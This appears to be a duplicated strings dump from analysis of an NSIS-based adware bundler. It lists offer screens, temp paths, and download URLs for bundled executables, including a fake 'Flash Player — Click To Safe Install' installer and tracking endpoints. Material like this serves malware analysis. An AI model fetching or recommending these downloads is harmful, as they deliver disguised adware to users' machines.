OfferScreen_145.html
OfferScreen_145.html
but1.png
but1.png
.PwF~
.PwF~
CompleteScreen.html
CompleteScreen.html
InstallScreen.html
InstallScreen.html
LoadingBar.gif
LoadingBar.gif
`,..VWW
`,..VWW
start-bullet.jpg
start-bullet.jpg
inflate 1.2.2 Copyright 1995-2004 Mark Adler
inflate 1.2.2 Copyright 1995-2004 Mark Adler
GetProcessHeap
GetProcessHeap
nsisunz.dll
nsisunz.dll
NL~%s
NL~%s
o7.6.3
o7.6.3
0*%UP
0*%UP
q.ya!
q.ya!
%u X`i@
%u X`i@
_$,ZS.db
_$,ZS.db
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB3.tmp\OfferScreen_145.html.old
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsjB3.tmp\OfferScreen_145.html.old
OF5A05~1.OLD
OF5A05~1.OLD
243.html#1?skipall=0buttons=1
243.html#1?skipall=0buttons=1
matecdnfast.us/os/OfferScreen_243_FP_spws243.zip~https://sp-storage.spccinta.com/sp-downloader.exe~https://sp-storage.spccinta.com/sp-downloader.exe~null~0~1#291~http://cdn.cmatecdnfast.us/os/js/OfferScreen_291_EN.zip~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~null~0~0#38~http://cdn.cmatecdnfast.us/os/js/OfferScreen_38_EN.zip~http://wajam-download.com/download/wajam_download_v2.exe~http://secure.goeastcdncache.com/Advertisers/wajam_download_v2.exe~null~0~0#235~http://cdn.cmatecdnfast.us/os/js/OfferScreen_235_EN.zip~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~null~0~0#145~http://cdn.cmatecdnfast.us/os/js/OfferScreen_145_EN.zip~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0
matecdnfast.us/os/OfferScreen_243_FP_spws243.zip~https://sp-storage.spccinta.com/sp-downloader.exe~https://sp-storage.spccinta.com/sp-downloader.exe~null~0~1#291~http://cdn.cmatecdnfast.us/os/js/OfferScreen_291_EN.zip~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~null~0~0#38~http://cdn.cmatecdnfast.us/os/js/OfferScreen_38_EN.zip~http://wajam-download.com/download/wajam_download_v2.exe~http://secure.goeastcdncache.com/Advertisers/wajam_download_v2.exe~null~0~0#235~http://cdn.cmatecdnfast.us/os/js/OfferScreen_235_EN.zip~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~null~0~0#145~http://cdn.cmatecdnfast.us/os/js/OfferScreen_145_EN.zip~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0
145~http://cdn.cmatecdnfast.us/os/js/OfferScreen_145_EN.zip~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0
145~http://cdn.cmatecdnfast.us/os/js/OfferScreen_145_EN.zip~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0
1953392
1953392
{E1070104-F404-44CE-B556-0622F9D63EE5}
{E1070104-F404-44CE-B556-0622F9D63EE5}
AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
ementById('btnJSClose').style.marginLeft="35px";
ementById('btnJSClose').style.marginLeft="35px";
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoBD.tmp
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoBD.tmp
etElementById('btnJSClose').style.marginLeft="35px";
etElementById('btnJSClose').style.marginLeft="35px";
c:\%original file name%.exe
c:\%original file name%.exe
%original file name%.exe
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nstB2.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nstB2.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
1704186
1704186
420088014
420088014
1638636
1638636
1835178
1835178
1507664
1507664
1638642
1638642
1638626
1638626
1114208
1114208
1966388
1966388
1245508
1245508
1507604
1507604
http://secure.goeastcdncache.com/BrandingImages/BI_Flash___Click_To_Safe_Install___________________________MA_02_9342.jpg
http://secure.goeastcdncache.com/BrandingImages/BI_Flash___Click_To_Safe_Install___________________________MA_02_9342.jpg
http://secure.ilandcachecdn.com/Advertisers/install_flashplayer11x32_mssd_aaa_aih.exe
http://secure.ilandcachecdn.com/Advertisers/install_flashplayer11x32_mssd_aaa_aih.exe
http://www.fglasspeast.com/FCL_Co_v4.php
http://www.fglasspeast.com/FCL_Co_v4.php
http://www.stsunsetwest.com/DSS_IMapplication_mon_NV1_2.php#http://www.stsunsetwest.com/DS_trackstats_mon_v2.php#CA#http://www.stsunsetwest.com/DS_AdvAffiliateId.php#http://www.stsunsetwest.com/DS_wrapper_details_v2.php#http://www.wajam.com/download/wajam_validate.exe#38/145/176/184/226/234/235/270/239/243/251/260/275/277/283/291/301/320/339/
http://www.stsunsetwest.com/DSS_IMapplication_mon_NV1_2.php#http://www.stsunsetwest.com/DS_trackstats_mon_v2.php#CA#http://www.stsunsetwest.com/DS_AdvAffiliateId.php#http://www.stsunsetwest.com/DS_wrapper_details_v2.php#http://www.wajam.com/download/wajam_validate.exe#38/145/176/184/226/234/235/270/239/243/251/260/275/277/283/291/301/320/339/
http://www.stsunsetwest.com/DSS_IMapplication_mon_NV1_2.php
http://www.stsunsetwest.com/DSS_IMapplication_mon_NV1_2.php
http://www.stsunsetwest.com/DS_trackstats_mon_v2.php
http://www.stsunsetwest.com/DS_trackstats_mon_v2.php
http://www.stsunsetwest.com/DS_AdvAffiliateId.php
http://www.stsunsetwest.com/DS_AdvAffiliateId.php
http://www.wajam.com/download/wajam_validate.exe
http://www.wajam.com/download/wajam_validate.exe
243~http://cdn.cmatecdnfast.us/os/OfferScreen_243_FP_spws243.zip~https://sp-storage.spccinta.com/sp-downloader.exe~https://sp-storage.spccinta.com/sp-downloader.exe~null~0~1#291~http://cdn.cmatecdnfast.us/os/js/OfferScreen_291_EN.zip~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~null~0~0#38~http://cdn.cmatecdnfast.us/os/js/OfferScreen_38_EN.zip~http://wajam-download.com/download/wajam_download_v2.exe~http://secure.goeastcdncache.com/Advertisers/wajam_download_v2.exe~null~0~0#235~http://cdn.cmatecdnfast.us/os/js/OfferScreen_235_EN.zip~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~null~0~0#145~http://cdn.cmatecdnfast.us/os/js/OfferScreen_145_EN.zip~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0
243~http://cdn.cmatecdnfast.us/os/OfferScreen_243_FP_spws243.zip~https://sp-storage.spccinta.com/sp-downloader.exe~https://sp-storage.spccinta.com/sp-downloader.exe~null~0~1#291~http://cdn.cmatecdnfast.us/os/js/OfferScreen_291_EN.zip~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~null~0~0#38~http://cdn.cmatecdnfast.us/os/js/OfferScreen_38_EN.zip~http://wajam-download.com/download/wajam_download_v2.exe~http://secure.goeastcdncache.com/Advertisers/wajam_download_v2.exe~null~0~0#235~http://cdn.cmatecdnfast.us/os/js/OfferScreen_235_EN.zip~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~null~0~0#145~http://cdn.cmatecdnfast.us/os/js/OfferScreen_145_EN.zip~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0
http://cdn.cmatecdnfast.us/os/OfferScreen_243_FP_spws243.zip
http://cdn.cmatecdnfast.us/os/OfferScreen_243_FP_spws243.zip
https://sp-storage.spccinta.com/sp-downloader.exe
https://sp-storage.spccinta.com/sp-downloader.exe
http://cdn.cmatecdnfast.us/os/js/OfferScreen_291_EN.zip
http://cdn.cmatecdnfast.us/os/js/OfferScreen_291_EN.zip
https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe
https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe
http://cdn.cmatecdnfast.us/os/js/OfferScreen_38_EN.zip
http://cdn.cmatecdnfast.us/os/js/OfferScreen_38_EN.zip
http://wajam-download.com/download/wajam_download_v2.exe
http://wajam-download.com/download/wajam_download_v2.exe
http://secure.goeastcdncache.com/Advertisers/wajam_download_v2.exe
http://secure.goeastcdncache.com/Advertisers/wajam_download_v2.exe
http://cdn.cmatecdnfast.us/os/js/OfferScreen_235_EN.zip
http://cdn.cmatecdnfast.us/os/js/OfferScreen_235_EN.zip
http://www.reghelper.com/rh/RegistryHelperSetupIM.exe
http://www.reghelper.com/rh/RegistryHelperSetupIM.exe
http://cdn.cmatecdnfast.us/os/js/OfferScreen_145_EN.zip
http://cdn.cmatecdnfast.us/os/js/OfferScreen_145_EN.zip
http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe
http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe
zip~https://sp-storage.spccinta.com/sp-downloader.exe~https://sp-storage.spccinta.com/sp-downloader.exe~null~0~1#291~http://cdn.cmatecdnfast.us/os/js/OfferScreen_291_EN.zip~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~null~0~0#38~http://cdn.cmatecdnfast.us/os/js/OfferScreen_38_EN.zip~http://wajam-download.com/download/wajam_download_v2.exe~http://secure.goeastcdncache.com/Advertisers/wajam_download_v2.exe~null~0~0#235~http://cdn.cmatecdnfast.us/os/js/OfferScreen_235_EN.zip~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~null~0~0#145~http://cdn.cmatecdnfast.us/os/js/OfferScreen_145_EN.zip~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0
zip~https://sp-storage.spccinta.com/sp-downloader.exe~https://sp-storage.spccinta.com/sp-downloader.exe~null~0~1#291~http://cdn.cmatecdnfast.us/os/js/OfferScreen_291_EN.zip~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~null~0~0#38~http://cdn.cmatecdnfast.us/os/js/OfferScreen_38_EN.zip~http://wajam-download.com/download/wajam_download_v2.exe~http://secure.goeastcdncache.com/Advertisers/wajam_download_v2.exe~null~0~0#235~http://cdn.cmatecdnfast.us/os/js/OfferScreen_235_EN.zip~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~null~0~0#145~http://cdn.cmatecdnfast.us/os/js/OfferScreen_145_EN.zip~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0
~https://sp-storage.spccinta.com/sp-downloader.exe~https://sp-storage.spccinta.com/sp-downloader.exe~null~0~1#291~http://cdn.cmatecdnfast.us/os/js/OfferScreen_291_EN.zip~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~null~0~0#38~http://cdn.cmatecdnfast.us/os/js/OfferScreen_38_EN.zip~http://wajam-download.com/download/wajam_download_v2.exe~http://secure.goeastcdncache.com/Advertisers/wajam_download_v2.exe~null~0~0#235~http://cdn.cmatecdnfast.us/os/js/OfferScreen_235_EN.zip~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~null~0~0#145~http://cdn.cmatecdnfast.us/os/js/OfferScreen_145_EN.zip~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0
~https://sp-storage.spccinta.com/sp-downloader.exe~https://sp-storage.spccinta.com/sp-downloader.exe~null~0~1#291~http://cdn.cmatecdnfast.us/os/js/OfferScreen_291_EN.zip~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~null~0~0#38~http://cdn.cmatecdnfast.us/os/js/OfferScreen_38_EN.zip~http://wajam-download.com/download/wajam_download_v2.exe~http://secure.goeastcdncache.com/Advertisers/wajam_download_v2.exe~null~0~0#235~http://cdn.cmatecdnfast.us/os/js/OfferScreen_235_EN.zip~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~null~0~0#145~http://cdn.cmatecdnfast.us/os/js/OfferScreen_145_EN.zip~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~http://cloudfront.systweak.com/downloads/new/rcpsetup_17970.exe~null~0~0
\Program Files\Internet Explorer\iexplore.exe" -nohome
\Program Files\Internet Explorer\iexplore.exe" -nohome
install_flashplayer11x32_mssd_aaa_aih.exe
install_flashplayer11x32_mssd_aaa_aih.exe
http://downloadupdates.in/MA1/flash_thankyou2.php
http://downloadupdates.in/MA1/flash_thankyou2.php
http://www.stsunsetwest.com/DS_wrapper_details_v2.php
http://www.stsunsetwest.com/DS_wrapper_details_v2.php
Flash Player~http://secure.goeastcdncache.com/BrandingImages/BI_Flash___Click_To_Safe_Install___________________________MA_02_9342.jpg~EI~http://secure.ilandcachecdn.com/Advertisers/install_flashplayer11x32_mssd_aaa_aih.exe~$BrowserToPop~0~0~~http://secure.goeastcdncache.com/nsi/nsis-html/WS_Flash___Click_To_Safe_Install___________________________MA_02_9342.zip~install_flashplayer11x32_mssd_aaa_aih.exe~http://downloadupdates.in/MA1/flash_thankyou2.php~3C~1~1~1~~~~~0~0~~OW
Flash Player~http://secure.goeastcdncache.com/BrandingImages/BI_Flash___Click_To_Safe_Install___________________________MA_02_9342.jpg~EI~http://secure.ilandcachecdn.com/Advertisers/install_flashplayer11x32_mssd_aaa_aih.exe~$BrowserToPop~0~0~~http://secure.goeastcdncache.com/nsi/nsis-html/WS_Flash___Click_To_Safe_Install___________________________MA_02_9342.zip~install_flashplayer11x32_mssd_aaa_aih.exe~http://downloadupdates.in/MA1/flash_thankyou2.php~3C~1~1~1~~~~~0~0~~OW
http://secure.goeastcdncache.com/nsi/nsis-html/WS_Flash___Click_To_Safe_Install___________________________MA_02_9342.zip
http://secure.goeastcdncache.com/nsi/nsis-html/WS_Flash___Click_To_Safe_Install___________________________MA_02_9342.zip
fast.us/os/js/OfferScreen_291_EN.zip~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~null~0~0
fast.us/os/js/OfferScreen_291_EN.zip~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~null~0~0
38~http://cdn.cmatecdnfast.us/os/js/OfferScreen_38_EN.zip~http://wajam-download.com/download/wajam_download_v2.exe~http://secure.goeastcdncache.com/Advertisers/wajam_download_v2.exe~null~0~0
38~http://cdn.cmatecdnfast.us/os/js/OfferScreen_38_EN.zip~http://wajam-download.com/download/wajam_download_v2.exe~http://secure.goeastcdncache.com/Advertisers/wajam_download_v2.exe~null~0~0
235~http://cdn.cmatecdnfast.us/os/js/OfferScreen_235_EN.zip~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~null~0~0
235~http://cdn.cmatecdnfast.us/os/js/OfferScreen_235_EN.zip~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~http://www.reghelper.com/rh/RegistryHelperSetupIM.exe~null~0~0
p://cdn.cmatecdnfast.us/os/js/OfferScreen_145_EN.zip
p://cdn.cmatecdnfast.us/os/js/OfferScreen_145_EN.zip
970.exe
970.exe
ps://sp-storage.spccinta.com/sp-downloader.exe~https://sp-storage.spccinta.com/sp-downloader.exe~null~0~1
ps://sp-storage.spccinta.com/sp-downloader.exe~https://sp-storage.spccinta.com/sp-downloader.exe~null~0~1
ge.exe~null~0~0
ge.exe~null~0~0
/s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~null~0~0
/s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~https://s3.amazonaws.com/cf_vopackage/SysInfo/VOPackage.exe~null~0~0
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32" /><description>Nullsoft Install System v11-Jul-2014.cvs</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32" /><description>Nullsoft Install System v11-Jul-2014.cvs</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>
%original file name%.exe_1812_rwx_00DA4000_00001000:
callback%d
callback%d